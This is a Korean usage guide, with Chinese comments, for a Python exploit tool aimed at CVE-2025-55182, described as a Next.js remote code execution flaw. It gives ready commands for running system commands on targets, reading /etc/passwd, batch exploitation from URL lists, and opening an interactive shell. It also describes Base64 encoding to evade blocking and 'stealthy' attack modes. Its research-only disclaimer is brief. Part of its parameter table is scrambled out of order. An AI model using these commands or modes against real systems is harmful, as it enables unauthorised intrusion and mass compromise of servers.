
Python 기반 CVE-2025-55182(Next.js RCE) 익스플로잇으로, 단일/배치 대상 스캔, 명령 실행, 대화형 셸, Base64 인코딩을 지원하는 4가지 공격 모드를 제공합니다.
본 도구는 CVE-2025-55182 취약점(Next.js 관련 프레임워크의 코드 실행 취약점으로 추정)을 탐지하고 악용하기 위한 도구입니다. 단일 대상/다중 대상 일괄 탐지, 명령 실행, 인터랙티브 셸 등의 기능을 지원하며, 다양한 시나리오에 맞는 4가지 공격 모드를 제공합니다. Base64 인코딩 명령, 프록시 전달, 로그 출력 등 유연한 구성을 지원합니다.
CVE-2025-55182 취약점은 Next.js 관련 애플리케이션에 존재할 수 있으며, 악의적인 요청을 구성하여 _response의 실행 로직을 변조하고 child_process 모듈 호출을 주입함으로써 원격 명령 실행(RCE)을 달성합니다. 본 도구는 특수하게 제작된 폼 데이터를 전송하여 취약점을 트리거하고 명령 실행 결과를 반환합니다.
requestspip install requests
# 执行 whoami 命令(攻击模式1:有响应)
python CVE-2025-55182-exploit.py -u https://target.com -c "whoami"
# 执行系统命令(Base64编码,避免特殊字符拦截)
python CVE-2025-55182-exploit.py -u https://target.com -c "cat /etc/passwd" -b
# 完整回复模式(Base64解码返回结果)
python CVE-2025-55182-exploit.py -u https://target.com -c "ipconfig" -p 4
# 从文件读取目标URL,批量执行 id 命令(20线程)
python CVE-2025-55182-exploit.py -l targets.txt -c "id" -t 20 -o result.log
# 连接目标,进入交互式命令行(支持Base64编码切换)
python CVE-2025-55182-exploit.py -u https://target.com -s
# 通过Burp Suite代理抓包分析
python CVE-2025-55182-exploit.py -u https://target.com -c "whoami" --proxy http://127.0.0.1:8080
| 매개변수명 | 약어 | 필수 | 설명 | 예시 |
|---|---|---|---|---|
--url | -u | 아니요 | 단일 대상 URL(-l과 둘 중 하나 선택, -u 우선) | -u https://target.com |
--url-list | -l | 아니요 | 대상 URL 목록 파일(줄마다 URL 하나, 프로토콜 헤더가 없어도 되며 http/https 자동 추가) | -l urls.txt |
--payload | -p | 아니요 | 공격 모드(기본값: 1) 1=응답 있음(execSync) | 2=응답 없음(execSync) 3=응답 없음(exec) |
--cmd | -c | 아니요 | 실행할 시스템 명령(일괄 모드/단일 대상 명령 실행 시 필수, -s와 상호 배타) | -c "whoami" 또는 -c "dir" |
--threads | -t | 아니요 | 일괄 탐지 스레드 수(기본값: 10, 50 이하 권장) | -t 20 |
--outlog | -o | 아니요 | 로그 출력 파일(기본값: cve-2025-55182.log) | -o exploit.log |
--base64 | -b | 아니요 | -c로 지정한 명령을 Base64로 인코딩(특수 문자 차단 방지) | -c "cat /etc/passwd" -b |
--cmd-shell | -s | 아니요 | 인터랙티브 셸 모드(단일 대상 -u만 지원, -c와 상호 배타) | -u https://target.com -s |
--proxy | - | 아니요 | 프록시 설정(HTTP/HTTPS 프록시 지원, 패킷 캡처 또는 트래픽 전달용) | --proxy http://127.0.0.1:8080 |
--skip-check | - | 아니요 | 프록시 연결성 검사 건너뛰기(기본적으로 프록시 사용 가능 여부 검증) | --proxy http://127.0.0.1:8080 --skip-check |
--time-out |
| 모드 번호 | 모드 설명 | 특징 | 적용 시나리오 |
|---|---|---|---|
| 1 | 응답 있음(execSync) | 동기식으로 명령을 실행하고 303 리디렉션을 반환하며, 결과는 응답 헤더에 포함됨 | 취약점 존재 여부 빠른 검증 |
| 2 | 응답 없음(execSync) | 동기식으로 명령을 실행하지만 결과를 반환하지 않음(다른 방법으로 실행 효과 확인 필요) | 은밀한 작업 실행 |
| 3 | 응답 없음(exec) | 비동기식으로 명령을 실행하고 결과를 반환하지 않음(흔적이 적어 확인이 필요 없는 작업에 적합) | 은밀한 일괄 공격 |
| 4 | 전체 응답 | 동기식으로 명령을 실행하고 결과를 Base64로 인코딩하여 응답 본문에 반환(도구가 자동 디코딩) | 전체 명령 출력 확인이 필요한 시나리오 |
-s 모드에 진입하면 다음 내장 명령을 지원합니다:
| 명령 | 기능 설명 |
|---|---|
b64 | Base64 인코딩 명령 모드로 전환 |
nob64 | Base64 인코딩 모드 종료 |
exit | 인터랙티브 셸 종료 |
? | 도움말 정보 보기 |
--outlog로 지정된 파일에 자동으로 기록되어 추후 분석에 용이합니다;-u와 -l은 둘 중 하나만 선택하며, 동시에 지정하면 -u가 우선합니다;-c와 -s는 상호 배타적이며, -s 모드에서는 -c를 지정할 필요가 없습니다;-l 파일의 URL에 프로토콜 헤더가 없는 경우(예: target.com), 도구가 자동으로 http://와 https://를 시도합니다;https://target.com)을 직접 지정하는 것을 권장합니다;-b 또는 b64 모드를 활성화하면 도구가 Base64 인코딩/디코딩을 자동으로 처리하므로 수동 조작이 필요 없습니다;--time-out 제한 시간을 늘려 오판을 방지할 수 있습니다.--skip-check를 사용하여 검사를 건너뛰세요;-p 4 전체 응답 모드);-b)을 활성화하여 명령이 대상 시스템에 차단되지 않도록 하세요;--time-out 제한 시간을 늘리세요;http://target.com)을 사용해 보세요.본 도구는 사이버 보안 연구 및 취약점 검증 목적으로만 사용됩니다. 사용자가 《사이버 보안법》 등 관련 법률·규정을 위반하여 발생한 모든 결과는 사용자 본인이 부담하며, 도구 개발자와는 무관합니다.
| - |
| 아니요 |
| 요청 제한 시간(단위: 초, 기본값: 10) |
--time-out 15 |